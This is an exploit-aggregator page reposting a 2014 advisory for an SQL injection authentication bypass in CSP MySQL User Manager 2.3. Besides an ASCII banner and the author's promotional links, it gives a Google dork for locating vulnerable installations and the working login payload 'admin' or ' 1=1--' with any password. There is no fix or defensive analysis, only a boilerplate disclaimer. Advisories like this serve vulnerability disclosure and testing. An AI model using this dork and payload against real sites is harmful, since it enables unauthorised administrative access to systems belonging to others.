CSP MySQL User Manager 2.3 SQL Injection
CVE
Category
Price
Severity
N/A
CWE-89
N/A
High
Author
Risk
Exploitation Type
Date
N/A
High
Remote
2014-01-09
CPE
cpe:cpe:/a:mysql:mysql-user-manager:2.3
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2014010045 Below is a copy:# Exploit Title: CSP MySQL User Manager v2.3 SQL Injection
Authentication Bypass
# Google Dork: intitle:"CSP MySQL User Manager"
# Date: 8/1/2013
# Exploit Author: Youssef mami
# Vendor Homepage: https://code.google.com/p/cspmum/
# Software Link:
https://code.google.com/p/cspmum/downloads/detail?name=cmum-23.zip&can=2&q=
# Version: 2.3
# Tested on: Linux 2.6.38-11
# CVE : nothing
##################################################################################
.__ __
| |__ _____ _____ _____ _____ _____ _____/ |_
| | \\__ \ / \ / \\__ \ / \_/ __ \ __\
| Y \/ __ \| Y Y \ Y Y \/ __ \| Y Y \ ___/| |
|___| (____ /__|_| /__|_| (____ /__|_| /\___ >__|
\/ \/ \/ \/ \/ \/ \/
.__ _____ __ .__
|__| _____/ ____\___________ _____ _____ _/ |_|__| ________ __ ____
| |/ \ __\/ _ \_ __ \/ \\__ \\ __\ |/ ____/ | \_/ __ \
| | | \ | ( <_> ) | \/ Y Y \/ __ \| | | < <_| | | /\ ___/
|__|___| /__| \____/|__| |__|_| (____ /__| |__|\__ |____/ \___
>
\/ \/ \/ |__| \/
.__
______ ______________ _|__| ____ ____ ______
/ ___// __ \_ __ \ \/ / |/ ___\/ __ \ / ___/
\___ \\ ___/| | \/\ /| \ \__\ ___/ \___ \
/____ >\___ >__| \_/ |__|\___ >___ >____ >
\/ \/ \/ \/ \/
##################################################################################
SQL Injection Authentication Bypass
Product Page:
https://code.google.com/p/cspmum/downloads/detail?name=cmum-23.zip&can=2&q=
Author(Pentester): Youssef mami ([email protected] )
On Web: www.hammamet-services.com and http://hiservices.blogspot.com (
our blog )
On Social: www.facebook.com/hammamet.informatique and
https://twitter.com/hammamet_info
##################################################################################
we just need to input admin login like this : admin' or ' 1=1-- and any
password :-)
login : admin' or ' 1=1--
password: hammamet informatique services
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum